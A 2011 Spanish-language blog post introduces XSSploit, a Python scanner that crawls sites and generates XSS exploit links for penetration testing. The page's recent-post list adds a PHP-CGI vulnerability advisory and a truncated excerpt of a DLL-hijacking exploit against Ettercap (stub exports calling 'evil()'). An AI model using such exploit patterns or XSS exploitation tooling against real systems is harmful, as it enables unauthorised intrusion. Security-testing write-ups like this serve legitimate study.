¡La Informática al límite!
XSSPloit: Un escáner de vulnerabilidades XSS
XSSploit es un escáner multi-plataforma de Cross-Site Scripting y exploiter escrito en Python. Se ha desarrollado para ayudar a descubrir y explotar las vulnerabilidades XSS en pruebas de penetración.
Cuando se utiliza, XSSploit primero se arrastra todo el sitio web e identifica las formas encontradas. A continuación, analiza estas formas de detectar automáticamente las vulnerabilidades existentes XSS, así como sus principales características.
Las vulnerabilidades que se hayan descubierto puede ser explotadas mediante un motor de explotacion del XSSploit. Esta funcionalidad extensible permite elegir el comportamiento deseado y genera automáticamente el enlace HTML con el payload del exploit embebido.
Requisitos:
- Python 2.5
- Wxpython
| Este artículo fue publicado por WindHack el 17 julio, 2011 a las 1:11 PM, y está archivado en Inseguridad Informática, Programación, Python. Sigue las respuestas a esta entrada a través de RSS 2.0. Puedes dejar un comentario o enviar un trackback desde tu propio sitio. |
Aún no hay trackbacks.
Grave vulnerabilidad en PHP-CGI
hace 1 semana - No hay comentarios
Grave vulnerabilidad en PHP-CGI Importancia: 5 – Crítica Fecha de publicación: 03/05/2012 Recursos afectados Servidores web con PHP ejecutándose como CGI. Descripción Posibilita el paso de parámetros al intérprete, lo que permite la ejecución de código arbitrario y la revelación de información confidencial. Solución Ya existen módulos de la herramienta de pentesting y hacking metasploit…
Funciones reducidas en Python
hace 3 semanas - No hay comentarios
Hola a todos, La idea de esta entrada es poner las funciones reducidas que he y hayan programado. Lo ideal es ver cuán cortas pueden ser.- Aquí comparto algunas strlen / len Forma normal def s(x): i = 0 for l in x: i += 1 return i Forma corta def l(x): return sum(1 for…
Ettercap NG-0.7.3 DLL Exploit
hace 1 mes - No hay comentarios
———————————————————————- Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Autor: $ slashdot Testeado: Windows XP SP3 Extensión Vulnerable: .pcap ———————————————————————- #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description()…
Escáner de códigos Qr en Python (Android)
hace 1 mes - No hay comentarios
Recién instalé SL4A en mi móvil, y decidí programar algo en Python. De esto, surgió el pyScanBarcode.py No siendo más, acá dejo el código #-*- coding: utf-8 -*- import android droid = android.Android() sCode = droid.scanBarcode() #Debug #print sCode (sRslt, sType) = sCode.result[’extras’][’la.droid.qr.result’], sCode.result[’extras’][’SCAN_RESULT_FORMAT’] QMSG = ”’ by .:WindHack:. Tipo: %s…
Resolver lista de ecuaciones cuadráticas en Python
hace 1 mes - No hay comentarios
Hoy vengo a presentar un script que tuve que realizar para un reto de un Wargame. El reto en sí, era resolver una gran lista de ecuaciones (aproximadamente 1.000), y posteriormente sumar todos sus resultados (enteros, nada más). Ej. 78x^2+8x-41446 66x^2+62x-124700 21x^2+15x-81654 Resultados: (23.0, -23.102564102564102) (43.0, -43.939393939393938) (62.0, -62.714285714285715) Respuesta: 23 + 43 + 62 =…
Uploader de imágenes (Imageshack & Imgur) en Python
hace 1 mes - No hay comentarios
Hace algún tiempo que no programaba algo interesante en Python, así que en un ataque de ánimo, me decidí a hacer este pequeño script. Básicamente es un uploader de imágenes el cual funciona mediante consola, los archivos pueden ser subidos a Imageshack/Yfrog e Imgur. Vale decir que es necesario tener instalado pycurl para que funcione correctamente. Modo de uso…
Psyco: acelera tus aplicaciones
hace 3 meses - No hay comentarios
Psyco es un módulo que nos permite mejorar la velocidad de nuestros programas a cambio de un pequeño tiempo de inicialización. Esto se logra a partir de la compilación de código. Para que Psyco compile tanto código como sea posible, sólo hay que añadir: import psyco psyco.full() Pero para aplicaciones complejas, la función full no será de ayuda puesto…
Instalar Python (y otros) en Android
hace 3 meses - No hay comentarios
Hace poco, por curiosidad, busqué una forma de instalar el intérprete de Python* en Android. Googleando un poco, di con unas aplicaciones que permiten portar y usar estos intérpretes de forma nativa en este sistema. * Aplica para varios lenguajes más, el proceso es el mismo. 1. Requisitos Un dispositivo con Android 2.0 o superior. El AC SWM (AndroidCentral Sideload Wonder Machine)…
Wapiti – Web application vulnerability scanner
hace 7 meses - 1 comentario
Wapiti es una aplicación que permite auditar la seguridad de sus aplicaciones web. No estudia el código fuente de la aplicación, pero va a escanear las páginas web de la webapp, en busca de scripts y de formas en las que se puedan inyectar datos. Posteriormente, Wapiti actúa como un fuzzer, inyectando payloads para ver si es vulnerable.…
Copiar imágenes del caché de Windows Live Messenger
hace 7 meses - 3 comentarios
Windows Live Messenger, guarda todas las imágenes de los contactos y las que se hayan compartido en una carpeta llamada “MessengerCache“. Pues bien, si se entra en esa carpeta (C:\Users\Usuario\AppData\Local\Temp\MessengerCache) se pueden ver gran cantidad de archivos sin extensión, los cuales corresponden, efectivamente, a varias imágenes. Es una tarea tediosa renombrar manualmente uno a uno…
hace 5 meses
muy bueno esto gracias por compartirlo, esta muy buena tu web
salu2